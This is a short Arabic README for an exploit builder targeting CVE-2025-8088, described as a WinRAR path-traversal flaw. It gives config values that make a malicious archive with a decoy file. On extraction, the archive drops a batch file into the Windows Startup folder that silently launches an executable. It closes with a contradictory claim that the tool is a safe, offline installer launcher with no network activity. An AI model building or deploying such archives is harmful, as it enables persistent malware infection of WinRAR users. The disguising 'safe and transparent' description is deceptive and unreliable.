
CVE-2025-8088-BUILDER
⚠ تم إنشاء هذه الأداة لأغراض تعليمية فقط. يُمنع منعًا باتًا استخدامها بشكل غير مصرح به خارج البيئات الخاضعة للتحكم.
نص برمجي بلغة Python يستغل ثغرة CVE-2025-8088، وهي ثغرة اجتياز مسار في WinRAR، عبر إنشاء أرشيف خبيث يضع حمولات قابلة للتنفيذ في مجلد بدء تشغيل Windows باستخدام مستويات متعددة من الأدلة النسبية لضمان التنفيذ الموثوق بغض النظر عن موقع الاستخراج.
قم بتهيئة ملف config.py
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
لاستخدام ملف خداعي خاص بك، اكتب مساره الكامل بدلاً من الاسم.
شغّل البرنامج النصي:
python CVE-2025-8088.py
سيظهر المخرج في مجلد output.
تم إنشاء هذه الأداة لأغراض تعليمية فقط. يُمنع منعًا باتًا الاستخدام غير المصرح به خارج البيئات الخاضعة للتحكم.
المؤلف: Desert Scripts
الوصف:
مشغّل محلي يعمل دون اتصال ويشغّل MyAppInstaller.exe.
لا يوجد أي نشاط شبكي. آمن وشفاف.